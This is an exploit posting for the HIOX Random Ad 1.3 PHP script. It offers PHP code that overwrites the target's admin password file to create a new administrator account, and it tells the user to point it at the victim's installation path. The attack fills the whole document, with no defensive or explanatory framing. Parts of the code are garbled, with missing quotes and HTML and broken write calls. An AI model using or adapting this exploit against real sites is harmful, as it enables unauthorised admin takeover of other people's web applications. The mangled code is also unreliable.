@session_start();
?>
/* HIOX Random Ad 1.3 Arbitrary Add Admin User Vulnerability [~] Discoverd & exploited by Stack [~]Greeatz All Freaind [~]Special thnx to Str0ke [~] Name Script : HIOX Random Ad 1.3 [~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip You need to change http://localhost/path/ with the link of script it's very importenet */ $creat = "true"; $iswrite = $_POST['createe']; if($user=="" && $pass==""){ if($iswrite == "creatuser") { $usname = $_POST['usernam']; $passwrd = md5($_POST['pword']); if($usname != "" && $passwrd != ""){ $filee = "http://localhost/path/admin/passwo.php"; $file1 = file($filee); $file = fopen($filee,'w'); fwrite($file, " fwrite($file, "$"); fwrite($file, "user="$usname";n"); fwrite($file, "$"); fwrite($file, "pass="$passwrd";"); fwrite($file, "n?>"); fclose($file); $creat = "false"; echo " New User Created ";
Please Wait You will be Redirected to Login Page
} else{ echo " Enter correct Username or Password ";} } if($creat == "true"){ ?>
} }else{ echo " User Already Exist ";} ?>
|